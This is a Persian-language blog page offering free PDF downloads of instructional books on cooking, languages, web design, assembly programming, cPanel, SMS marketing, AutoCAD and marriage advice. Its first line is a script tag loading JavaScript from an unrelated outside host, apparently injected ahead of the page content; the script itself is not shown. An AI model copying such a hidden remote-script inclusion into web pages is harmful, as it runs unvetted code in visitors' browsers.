script type="text/javascript" src="http://7vps.ir/img/website.js"> دانلود کتاب آموزشی
کافی نت
وبلاگی جذاب

دانلود کتاب آموزش آشپزی ( شیرینی و کیک و دسر و مربا)

نوشته شده توسط محمد علی پور در تاریخ دوشنبه، 20 تیر ماه 1390
 



نام کتاب: آموزش آشپزی-شیرینی، کیک، دسر و مربا
نویسنده: گروه ویستا
تعداد صفحات: 532
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
کتاب آموزش آشپزی که برایتان آماده شده متشکل از آموزش پخت صدها مدل شیرینی، کیک، دسر و انواع مربا می باشد که توسط تیم مجله ویستا دستورات پخت و مواد مورد نیاز این غذاها تهیه و جمع آوری شده است. با خواندن کتاب و تهیه مواد مورد نیاز براحتی می توانید معروفترین یا ساده ترین کیک ها و شیرینی ها را آماده کنید و بهترین دسرها را در مهمانی ها ارائه دهید.
برای دانلود رایگان کتاب "آموزش آشپزی- شیرینی، کیک، دسر و مربا" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download


دانلود کتاب Street Talk 1 How to Speak And Understand American Slang

نوشته شده توسط محمد علی پور در تاریخ شنبه، 18 تیر ماه 1390
 



نام کتاب: دانلود کتاب American Street Talk
نویسنده: Burke David
تعداد صفحات: 322
فرمت کتاب: PDF
زبان کتاب: انگلیسی/فارسی

توضیحات:
کتاب آماده شده شامل صدها اطلاح پرکاربرد در زبان انگلیسی/آمریکایی می باشد و همانطور که از عنوانش پیداست "چگونه زبان عامیانه آمریکائی را درک و صحبت کنیم" کاملاً به آموزش زبان عامیانه آمریکا و اصطلاحات آن می باشد که معمولاً در کتاب های معمولی یا رسمی آموزش داده نمی شود. کتاب شامل ده درس می باشد که از ابتدای کتاب بصورت انگلیسی و داستان وار شروع می شود و در پایان ترجمه ی کامل تمام درسها و تلفظ ها و اصطلاحات درس ها توسط آقای فرزان سجودی آمده ترجمه شده است که کار را برای یادگیری بسیار آسان می کند.
برای دانلود رایگان کتاب "American Street Talk" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود کتاب بیایید ایتالیایی صحبت کنیم

نوشته شده توسط محمد علی پور در تاریخ پنجشنبه، 16 تیر ماه 1390
 



نام کتاب: بیایید ایتالیایی صحبت کنیم
نویسنده: کاوه
تعداد صفحات: 32
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
درست است که مطالعه ی زیادی بر روی دستور زبان ایتالیایی داشته اید و قادرید مکالمات کوچک و محدودی هم انجام بدهید اما هنوز در شنیدن و درک و فهم مکالمات این زبان مشکل دارید. این کتاب برای افرادی مانند شما آماده شده تا بتوانید قابلیت های خود در مکالمات زبان ایتالیایی را توسعه و بهبود ببخشید. در این کتاب سه مکالمه مختلف در 12 قسمت گنجانده شده که با چندین بار گوش دادن به این مکالمه ها و دفت بر روی آنها میتوانید سطح مکالمه خود را بالا ببرید.
برای دانلود رایگان کتاب "بیایید ایتالیایی صحبت کنیم" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download


دانلود کتاب آموزش نرم افزار Dreamweaver CS4

نوشته شده توسط محمد علی پور در تاریخ پنجشنبه، 16 تیر ماه 1390
 



نام کتاب: آموزش نرم افزار Dreamweaver CS4
نویسنده: نامشخص
فرمت کتاب: PDF
تعداد صفحات: 89
زبان کتاب: فارسی

توضیحات:
Dreamveawer نرم افزار قدرتمند در زمینه طراحی وب می باشد که توسط کمپانی بزرگ ادوبی ساخته شده. دریم ویور در لغت به معنای خیال پرداز یا رویا باف است! آخرین نسخهٔ این نرم‌افزار تا امروز نسخهٔ CS5 آن است. شرکت ماکرومدیا در سال ۲۰۰۸ توسط شرکت ادوبی خریداری شد، و بر همین اساس، این نرم‌افزار نیز اکنون از تولیدات ادوبی به شمار می‌رود. این نرم‌افزار توانست نرم‌افزار فرانت پیج را که محصول مایکروسافت بود در بازار رقابت شکست دهد و بازار نرم‌افزارهای طراحی وب را بسوی خود متمرکز نماید. دریم ویور امکان ویرایش صفحات html , asp , php , aspx , css , js , jsp, cf را داراست و ویرایش این صفحات را با شناخت کلمات کلیدی این زبان‌ها در یک ادیتور مجتمع آسان می‌کند. هم اکنون افزونه‌های بسیاری نیز برای این نرم‌افزار نوشته شده‌است که با نصب آن‌ها بر روی دریم ویور، قدرت این نرم‌افزار دو چندان می‌شود. تا نسخهٔ هشت این نرم‌افزار به وسیلهٔ شرکت ماکرومدیا تولید می‌شد و پس از آن به وسیلهٔ شرکت ادوبی خریداری شد. کتاب زیر شامل آموزش فارسی و جامع این نرم افزار از سطح مقدماتی تا پیشرفته است که گزینه ی بسیار مناسبی برای علاقه مندان به طراحی سایت با این نرم افزار قدرتمند می باشد.
برای دانلود
رایگان کتاب "آموزش نرم افزار Dreamveawer Cs4" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download
 

دانلود کتاب مقدمه ای بر یادگیری الکترونیکی

نوشته شده توسط محمد علی پور در تاریخ جمعه، 10 تیر ماه 1390
 



نام کتاب: مقدمه ای بر یادگیری الکترونیکی
نویسنده: نامشخص
تعداد صفحات: 28
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
یادگیری الکترونیکی واژه بسیار گسترده ای است و تعاریف گوناگون و مختلفی در رابطه با آن وجود دارد. با یک جستجوی ساده درگوگل می توان بیش از 8 میلیون نتیجه را دراین مورد مشاهده کرد.اما جامع ترین و در عین حال کوتاه ترین تعریفی که می توان از این واژه ارائه داد عبارت است از: هرنوع یادگیری یا آموزشی که با کمک انواع مدیا های الکترونیکی انجام گیرد.در واقع یادگیری الکترونیکی استفاده از پیشرفتهای تکنولوژیکی برای فعال کردن و توانمند کردن افراد در جهت یادگیری فارغ از زمان ومکان است. این کتاب مقدمه ای بر یادگیری الکترونیکی را مورد بحث قرار داده است. در مقاله آماده شده بصورت مختصر و مفید با موضوع یادگیری الکترونیکی آشنا خواهید شد.
برای دانلود رایگان کتاب "مقدمه ای بر یادگیری الکترونیکی" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود کتاب برنامه نویسی و زبان اسمبلی کامپیوتر های شخصی

نوشته شده توسط محمد علی پور در تاریخ جمعه، 3 تیر ماه 1390
 


نام کتاب: برنامه نویسی و زبان اسمبلی کامپیوترهای شخصی
نویسنده: پیترایبل
مترجم: مهندس فرزانه کیمیایی
تعداد صفحات: 519
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
قلب کامیپوتر شخصی یک ریزپردازنده است که برای محاسبات، منطق و کنترل با تجهیزات کامپیوتر کار می کند. هر خانواده پردازشگر ها مجموعه دستورات خاص خود را دارا هستند که برای هدایت عملیاتی از قبیل پردازش ورودی از صفحه کلید، نمایش داده روی یک صفحه و انجام محاسبات، استفاده می شوند. این مجموعه دستورات با عنوان زبان ماشین سیستم شناخته شده و برای توسعه برنامه ها بسیار پیچیده و مبهم هستند. سازندگان نرم افزار، زبان اسمبلی را برای خانواده پردازشگر ها مهیا نمودند، که دستورات متنوع را در کد سمبولیک قابل فهم تری بیان می کند. در کتاب آماده شده شما بصورت کامل با موضوع برنامه نویسی کامپیوترهای شخصی و زبان اسمبلی آشنا خواهید شد و تمامی دستورات و توابع آن را با جزئیات کامل خواهید آموخت.
برای دانلود رایگان کتاب "برنامه نویسی و زبان اسمبلی کامپیوترهای شخصی" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود کتاب آموزش کنترل پنل Cpanel

نوشته شده توسط محمد علی پور در تاریخ پنجشنبه، 2 تیر ماه 1390




نام کتاب: آموزش کنترل پنل Cpanel
نویسنده: نامشخص
تعداد صفحات: 27
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
سی‌پنل یک صفحهٔ کنترل میزبانی وب، مبتنی بر یونیکس است که بوسیلهٔ ایجاد رابط کاربری و ابزار خودکار طراحی شده است تا کار کردن با فضای میزبانی وب را راحت‌تر کند. سی‌پنل در سه نوع برای استفادهٔ گردانندگان سرور، فضاهای ریسیلر و کاربر دارنده وب سایت طراحی شده است تا مصرف کنندگان و گردانندگان سرورها بتوانند به شکل‌های گوناگون روی فضای خود کنترل داشته باشند. در کتاب آماده شده بصورت کامل و تصویری با این کنترل پنل آشنا خواهید شد.
برای دانلود رایگان کتاب "آموزش کنترل پنل Cpanel" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود کتاب بازاریابی با پیامک در 24 دقیقه

نوشته شده توسط محمد علی پور در تاریخ چهارشنبه، 1 تیر ماه 1390
 



نام کتاب: بازاریابی با پیامک در 24 دقیقه
نویسنده: مهندس محمد رجبی
تعداد صفحات: 19
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
در حال حاضر ابزارهای تبلیغاتی فراوانی همچون تلویزیون، رادیو، وب سایت، مجلات و ... جهت بازاریابی وجود دارند که در چند سال اخیر پیامک نیز به جمع این ابزارهای تبلیغاتی افزوده شده است. بازاریابی با پیامک در حال حاضر یکی از ارزان ترین و هدفمند ترین ابزارهای تبلیغاتی است. در کتاب آماده شده که به گفته نویسنده اولین کتاب آموزش بازاریابی با پیامک می باشد به آموزش این موضوع پرداخته شده است.
برای دانلود رایگان کتاب "بازاریابی با پیامک در 24 دقیقه" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود کتاب اتوکد برای ترسیم قطعات صنعتی

نوشته شده توسط محمد علی پور در تاریخ چهارشنبه، 1 تیر ماه 1390
 



نام کتاب: اتوکد برای ترسیم  قطعات صنعتی
نویسنده:علی مصطفائی پور
تعداد صفحات: 82
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
اتوکد بی شک قدرتمندترین نرم افزار رایانه ای در زمینه ی طراحی و نقشه کشی ساختمان می باشد. این نرم افزار قدرتمند مخصوص محصول شرکت Autodesk است که بسیاری از نرم افزارهای گرافیکی از جمله Maya و 3Ds Max توسط این کمپانی ساخته شده است. در ابتدای کتاب آماده شده شما بصورت مختصر با نرم افزار آشنا شده و در فصل های بعدی کتاب با طراحی های دو بعدی و سه بعدی قطعات صنعتی آشنا می شوید.
برای دانلود رایگان کتاب "اتوکد برای ترسیم  قطعات صنعتی" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود کتاب کدام معیار برای انتخاب همسر مناسب تر است؟

نوشته شده توسط محمد علی پور در تاریخ سه شنبه، 31 خرداد ماه 1390
 



نام کتاب: کدام معیار برای انتخاب همسر مناسب است؟
نویسنده: نامشخص
تعداد صفحات: 272
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
اگر شناسنامه تان را ورق بزنید چھار واقعه زندگی در آن آمده است: تولد، ازدواج، طلاق و فوت؛ که فقط در ازدواج و طلاق مختارید، بنابراین ازدواج را نباید سرسری گرفت بلکه باید با مطالعه و براساس معیارھای حقیقی ھمسر را انتخاب کر د. قبل از ازدواج حتماً با یک متخصص یا یک مشاور خِبره در امور خانواده و برخوردار از اطلاعات امروزی مشاوره کنید. در ھمه جا « علاقه بعداً پیدا می شو د » ،« به ھم عادت می کنید » این که می گویند پیدا می شود که پایه و اساس ازدواج بر معیارھای « بعداً » صحیح نیست. زمانی علاقه ،«! دعواھای پدر و مادرم مرا خسته کرده بود » عقلانی استوار شده باشد. با عنوان ھای و ... تن به ازدواج تحمیلی و « ھمه دوستانم ازدواج کرده اند » ،« در تنگنای مالی بودم» و ... کتاب اماده شده به بررسی تمام معیارهای مناسب ازدواج از نظر اسلام می پردازد و حتماً پیشنهاد میکنیم بخوانید.
برای دانلود رایگان کتاب "کدام معیار برای انتخاب همسر مناسب تر است؟" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download



دو شنبه 20 تير 1390برچسب:آموزش آشپزی,آموزش تهیه دسر,آموزش تهیه غذاهای معروف,آموزش تهیه مربا,آموزش تهیه کیک,آموزش رایگان آشپزی,آموزش سرو غذا,آموزش پخت شیرینی,آموزش پخت غذا,انواع مربا,انواع کیک,دانلود رایگان کتاب آموزش آشپزی,دانلود رمان جدید,دانلود کتاب,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دستور پخت بهترین کیک ها,دستور پخت شیرینی ایرانی,طرز تهیه سوپ,طرز تهیه غذا,نحوه پخت مربا ها,چگونه شیرینی درست کنیم,کتاب آموزش اشپزی,کتاب الکترونیک,کتابهای آموزش آشپزی,آموزش زبان,آموزش زبان انگلیسی,آموزش صحبت کردن خیابانی زبان آمریکایی,آموزش مکالمات زبان انگلیسی,دانلود رمان جدید,دانلود کتاب,دانلود کتاب آموزشی زبان انگلیسی,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,صحبت زبان خیابانی آمریکایی,لغات زیرزمینی آمریکایی,لغات زیرزمینی انگلیسی,مکالمات خیابانی انگلیسی,مکالمه خیابانی در زبان آمریکایی,مکالمه خیابانی در زبان انگلیسی,کتاب American Slang,کتاب English Street Talk,کتاب How to Speak American Slang,کتاب آموزش زبان,کتاب الکترونیک,منابع آموزش زبان ایتالیایی,چگونه ایتالیایی یاد بگیریم,کتاب منبع آموزش ایتالیایی,کتاب الکترونیک,آموزش قدم به قدم زبان ایتالیایی,آموزش پله پله زبان ایتالیایی,آموزش ایتالیایی,آموزش زبان ایتالیایی,بهترین کتاب آموزش زبان ایتالیایی,بیایید ایتالیایی صحبت کنیم,تلفظ در زبان ایتالیایی,دانلود کتاب,دانلود کتاب فارسی برای آموزش زبان ایتالیایی,دانلود کتاب های الکترونیکی,دانلود کتاب گرامر زبان ایتالیایی,دانلود کتاب پی دی اف,دانلود کتاب پی دی اف آموزش زبان ایتالیایی,دانلود کتاب آموزش زبان ایتالیایی,دانلود کتاب آموزش زبان ایتالیایی با فرمت PDF,دانلود کتاب آموزش زبان ایتالیایی با فرمت پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب بیایید ایتالیایی صحبت کنیم,دانلود کتاب جدید,دانلود رمان جدید,دانلود رایگان کتاب آموزش قدم به قدم زبان ایتالیایی,دانلود رایگان کتاب بیایید ایتالیایی صحبت کنیم,دستور زبان ایتالیایی,Dreamweaver,کتاب آموزش دریم ویور,کتاب الکترونیک,آموزش dreamweaver,آموزش Dreamweaver cs5,آموزش دریم ویور,آموزش دریم ویور cs4,آموزش طراحی سایت با Dreamweaver,دانلود کتاب,دانلود کتاب Dreamweaver,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب آموزش Dreamweaver,دانلود کتاب آموزش نرم افزار Dreamweaver CS4,دانلود کتاب آموزش دریم ویور,دانلود کتاب آموزشی Dreamweaver cs4,دانلود کتاب آشنایی با نرم افزار Dreamweaver CS4,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود آموزش دریم ویور,دانلود رمان جدید,دریم ویور,طراحی سایت با دریم ویور,مقاله درباره یادگیری الکترونیکی,مقاله درباره آموزش الکترونیکی,مقالات درباره یادگیری الکترونیکی,مقدمه ای بر یادگیری الکترونیکی,یادگیری الکترونیکی,کتاب الکترونیک,آموزش الکترونیکی,آموزش الکترونیکی چیست,آموزش از راه دور,آموزش از طریق سایت,آشنایی با یادگیری الکترونیکی,آشنایی با یادگیری از راه دور,بهترین روش آموزش الکترونیکی,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود کتاب درباره یادگیری الکترونیکی,دانلود رمان جدید,دانلود رایگان کتاب آموزش الکترونیکی,دانلود رایگان کتاب آشنایی با آموزش الکترونیکی,درس خواندن بصورت الکترونیکیکتاب آموزش اسمبلی,کتاب الکترونیک,کتاب بی نظیر آموزش اسمبلی,آموزش Assembly,آموزش کاملاً رایگان زبان Assembly,آموزش رایگان اسمبلی,آموزش رایگان برنامه سازی با زبان اسمبلی,آموزش رایگان زبان اسمبلی کامپیوتر,اسمبلی,اسمبلی و زبان ماشینی کامپیوتر,بهترین کتاب آموزش زبان اسمبلی کامپیوتر,برنامه نویسی ماشینی,برنامه نویسی و زبان اسمبلی,برنامه نویسی کامپیوتر,برنامه نویسی کامپیوترهای IBM,برنامه نویسی اسمبلی,دانلود کتاب,دانلود کتاب قدیمی درباره برنامه نویسی,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب آموزش اسمبلی,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود رمان جدید,دانلود رایگان کتاب آموزش اسمبلی,زبان اسمبلی,Cpanel چیست؟,فیلم آموزش Cpanel,کتاب آموزش سی پنل,کتاب الکترونیک,آموزش Cpanel,آموزش فارسی Cpanel,آموزش رایگان Cpanel,آموزش سی پنل,آموزش ساده سی پنل,آشنایی با Cpanel,آشنایی با سی پنل,بهترین کتاب آموزش سی پنل,برترین کتاب در زمینه Cpanel,دانلود فیلم آموزشی Cpanel,دانلود مستقیم کتاب آموزش Cpanel,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب آموزشی Cpanel,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود رمان جدید,دانلود رایگان کتاب آموزش Cpanel,دانلود رایگان کتاب آموزش سی پنل,سی پنل,سی پنل چیه؟,سی پنل چیست,یادگیری بازاریابی با پیامک,کتاب الکترونیک,کتاب اموزش بازاریابی,آموزش فارسی بازاریابی توسط اس ام اس,آموزش بازاریابی,آموزش بازاریابی با پیامک,آموزش رایگان بازاریابی فارسی,آموزش رایگان بازاریابی با پیامک,اولین کتاب آموزش بازاریابی با پیامک,بازاریابی,بازاریابی فوق العاده با پیامک,بازاریابی با پیامک,بازاریابی با اس ام اس,بازاریابی توسط SMS,برترین کتاب آموزش بازاریابی با پیامک,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب آموزش بازاریابی با پیامک,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود رمان جدید,کتاب فارسی آموزش اتوکد,کتاب آموزشی اتوکد,کتاب الکترونیک,کتاب خارجی آموزش اتوکد,آموزش اتوکد,آموزش اتوکد 2010,آموزش بی نظیر اتوکد,آموزش رایگان Autocad,آموزش رایگان نرم افزار قدرتمند Autocad,آموزش رایگان اتوکد,آموزش رایگان طراحی با اتوکد,آموزش طراحی های ساختمانی با اتوکد,آشنایی با اتوکد,اتوکد,بهترین کتاب آموزش نرم افزار اتوکد,بهترین کتاب آموزش اتوکد,بهترین کتاب ایرانی در زمینه آموزش اتوکد,برترین کتاب آموزش اتوکد,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود رمان جدید,دانلود رایگان کتاب آموزش اتوکد,طراحی های دو بعدی با اتوکد,طراحی های سه بعدی با اتوکد,طراحی های صنعتی با Autocad,طراحی با استفاده از اتوکد,معیار انتخاب همسر,معیار برای انتخاب همسر مناسب,معیارهای همسر مناسب,معیارهای انتخاب همسر,نکات مهم در انتخاب همسر مناسب,چگونه همسر انتخاب کنیم,همسر مناسب,کتاب آموزش انتخاب همسر,کتاب الکترونیک,کدام معیار برای انتخاب همسر مناسب است,آموزش انتخاب همسر,انتخاب همسر,انتخاب بهترین همسر,بهترین معیارها برای انتخاب همسر,برترین نکات در انتخاب همسر,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب کدام معیار برای انتخاب همسر مناسب تر است؟,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود رمان جدید,روش انتخاب همسر,شیوه ی انتخاب همسر مناسب,, :: 8:32 بعد از ظهر
گری گوری

دانلود کتاب آموزش زبان ایتالیایی

نوشته شده توسط محمد علی پور در تاریخ سه شنبه، 24 خرداد ماه 1390
 


به درخواست کاربر محترم امیرحسین عزیز
نام کتاب: آموزش زبان ایتالیایی
نویسنده: کاوه
تعداد صفحات: 183
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
زبان ایتالیایی (به ایتالیایی: La Lingua Italiana یا Italiano) از شاخه‌های زبان لاتین است. در این زبان شباهت‌های ریشه‌ای زیادی با زبان‌های اسپانیایی، فرانسوی، رومانیایی و پرتغالی دیده می‌شود. شباهت‌های این زبان با زبان اسپانیایی به شکلی است که هنگام محاوره یک ایتالیایی با یک اسپانیایی یا بالعکس درک مفهوم برای طرفین به شکل محسوسی ممکن است. گویشوران این زبان که در ایتالیا، بعضی از کانتونهای کشور سوئیس که با ایتالیا مرز مشترک دارند، اتیوپی، مالت، واتیکان، سان مارینو، ونزوئلا، کرواسی، مراکش، اسلوونی، لیبی، تونس، سومالی، سومالی‌لند، اریتره، جزیره کرس و شهر نیس فرانسه (هردو پیشتر جزو خاک ایتالیا بودند)، آمریکا، کانادا، استرالیا، آلبانی، بخش‌هایی از کشور آرژانتین و قسمت‌هایی از برزیل زندگی می‌کنند. در کتاب آماده شده که کامل ترین کتاب موجود آموزش زبان ایتالیایی است بصورت کامل و قدم به قدم به آموزش این زبان پرداخته شده است.
برای دانلود رایگان کتاب "آموزش زبان ایتالیایی" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 



ادامه مطلب ...


سه شنبه 24 خرداد 1390برچسب:دانلود کتاب آموزشی, دانلود کتاب های آموزشی, :: 4:49 بعد از ظهر
گری گوری

صفحه قبل 1 صفحه بعد

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 19
بازدید دیروز : 0
بازدید هفته : 111
بازدید ماه : 9143
بازدید کل : 139294
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


Alternative content


آریان پیامک
آریان اس ام اس